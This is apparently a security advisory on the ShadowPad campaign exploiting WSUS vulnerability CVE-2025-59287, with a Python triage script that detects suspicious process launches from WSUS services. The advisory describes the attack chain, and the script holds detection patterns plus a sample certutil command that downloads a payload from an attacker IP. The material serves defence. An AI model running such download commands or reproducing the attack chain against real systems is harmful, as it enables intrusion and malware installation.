ShadowPad Propagation via Exploitation of WSUS RCE Flaw


In November 2025, ASEC uncovered an advanced cyberattack campaign that exploited a severe vulnerability in Microsoft Windows Server Update Services (WSUS) – tracked as CVE-2025-59287. The attacks deploy ShadowPad, a highly modular and stealthy malware tool associated with Chinese state-sponsored APT groups.

Severity: High

Threat Details

    • Vulnerability: CVE-2025-59287 (CVSS Score: 9.8) is an unsafe deserialization flaw in WSUS. It allows an unauthenticated, remote attacker to execute arbitrary code with the highest privileges (SYSTEM) by sending specially crafted data over the network to the WSUS service ports (8530/8531).
    • Initial Access: The threat actor exploited the CVE-2025-59287 vulnerability on Windows Servers with the WSUS Server Role enabled.
    • Foothold: After exploitation, the attackers used the RCE to download and execute PowerCat (an open-source PowerShell-based Netcat utility) to establish a reverse system command shell on the victim server.
    • Malware Payload: The main payload is ShadowPad, a modular backdoor and Remote Access Trojan (RAT) commonly associated with Chinese APT groups like APT41, APT23, and Tonto Team. It is a closed-source malware-as-a-service platform for espionage.
    • Installation Method: The attackers re-used the RCE vulnerability to execute legitimate Windows utilities, specifically curl.exe and certutil.exe, to download, decode, and install the ShadowPad components from a remote server (e.g., 149.28.78[.]189:42306).
    • Execution: ShadowPad achieves execution and persistence through DLL Sideloading, using a legitimate executable (ETDCtrlHelper.exe) to load its malicious DLL (ETDApix.dll). The core functionality is contained in an encrypted data file (0C137A80.tmp).
    • Post-Compromise: The malware establishes persistence using a service name/mutex (Q-X64) and a Task Scheduler entry. The primary Command and Control (C&C) server addresses are configured to communicate over both HTTP and HTTPS (e.g., 163.61.102[.]245:443).
    • Risk Implication: Since WSUS is a core enterprise patching component, a successful compromise not only grants the attackers SYSTEM-level control over the server but also poses a potential supply-chain threat if the actor were to distribute malicious updates to all downstream client machines managed by that WSUS server.

Recommendations

    1. Immediately apply Microsoft’s patch for CVE-2025-59287 to all WSUS-enabled systems.
    2. Ensure only Microsoft Update servers can access WSUS. Consider blocking inbound traffic on TCP ports 8530 and 8531 for all other sources.
    3. Actively monitor and alert on the execution of suspicious processes originating from the WSUS service parent processes (w3wp.exe or wsusservice.exe), particularly:
      • powershell.exe (especially when using encoded commands or downloading files via IEX or DownloadString)
      • certutil.exe (used for decoding and downloading files)
      • curl.exe or wget (used for downloading external content)
      • PowerCat commands or signatures
    4. Block the IOCs at their respective controls:
      https://www.virustotal.com/gui/collection/877dbd9912a95692315eaf7d283060a04f1e8a186b870f340707a84d06db0026/iocs
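The monitoring rule in recommendation 3 and the indicators quoted in the Threat Details can be expressed as a small triage routine over process-creation telemetry. The following is an added example, not tooling from Ampcus Cyber or ASEC: it reads records in the field layout of Windows Security event 4688 / Sysmon event 1 (ParentImage, Image, CommandLine), flags command interpreters and download utilities spawned by the WSUS worker processes, applies the command-line heuristics from the advisory, and matches the advisory's own IOC strings. The sample records, their paths and the `<base64 placeholder>` / `<path>` values are constructed for the demonstration.

```python
import re

# Process-creation sources such as Windows Security 4688 or Sysmon event 1
# expose ParentImage, Image and CommandLine. The parents below are the WSUS
# service processes named in recommendation 3; they should never spawn
# the children listed.
WSUS_PARENTS = {"w3wp.exe", "wsusservice.exe"}
SUSPICIOUS_CHILDREN = {"powershell.exe", "pwsh.exe", "certutil.exe", "curl.exe", "wget.exe"}

# Command-line heuristics from recommendation 3: encoded PowerShell, IEX or
# DownloadString, certutil decode/download, and PowerCat usage.
CMDLINE_HEURISTICS = [
    ("encoded PowerShell", re.compile(r"(?i)\s-(e|ec|enc|encodedcommand)\s")),
    ("IEX / DownloadString", re.compile(r"(?i)\bIEX\b|Invoke-Expression|DownloadString|DownloadFile")),
    ("certutil decode/download", re.compile(r"(?i)certutil(\.exe)?\s.*-(decode|urlcache)")),
    ("PowerCat", re.compile(r"(?i)powercat")),
]

# Indicators quoted in the advisory; the defanged "[.]" is normalised before matching.
IOC_STRINGS = ["149.28.78.189", "163.61.102.245",
               "ETDCtrlHelper.exe", "ETDApix.dll", "0C137A80.tmp", "Q-X64"]


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyse(event):
    """Return the reasons one process-creation record is suspicious ([] if none)."""
    reasons = []
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    # Parent context matters: the same child under explorer.exe is not flagged.
    if parent in WSUS_PARENTS:
        if child in SUSPICIOUS_CHILDREN:
            reasons.append(f"{parent} spawned {child}")
        for name, pattern in CMDLINE_HEURISTICS:
            if pattern.search(cmd):
                reasons.append(f"{name} under {parent}")
    # IOC matching is parent-independent: a sideloaded helper or C&C address
    # is suspicious wherever it appears.
    haystack = f"{cmd} {event.get('Image', '')}".replace("[.]", ".").lower()
    for ioc in IOC_STRINGS:
        if ioc.lower() in haystack:
            reasons.append(f"advisory IOC {ioc}")
    return reasons


def triage(events):
    """Map ProcessId -> reasons for every record that trips at least one rule."""
    hits = {}
    for event in events:
        reasons = analyse(event)
        if reasons:
            hits[event["ProcessId"]] = reasons
    return hits


# Constructed sample records (not real telemetry) using 4688/Sysmon field names.
SAMPLE_EVENTS = [
    {"ProcessId": 1001, "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc <base64 placeholder>"},
    {"ProcessId": 1002, "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil.exe -urlcache -split -f http://149.28.78[.]189:42306/<path> ETDApix.dll"},
    {"ProcessId": 1003, "ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "svchost.exe -k netsvcs -p"},
    {"ProcessId": 1004, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": "curl.exe -O https://example.com/readme.txt"},
    {"ProcessId": 1005, "ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\ProgramData\ETDCtrlHelper.exe",
     "CommandLine": "ETDCtrlHelper.exe"},
]

if __name__ == "__main__":
    for pid, reasons in triage(SAMPLE_EVENTS).items():
        print(pid, "->", "; ".join(reasons))
```

The parent check is what keeps the rule usable on a busy server: curl.exe launched by an interactive user is ignored, while the same binary under w3wp.exe or wsusservice.exe is alerted on. IOC matching runs regardless of parent so that the sideloaded ETDCtrlHelper.exe launched from a scheduled task is still caught, and the defanged `[.]` form used in advisories is normalised so operators can paste indicators as published.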

Ampcus Cyber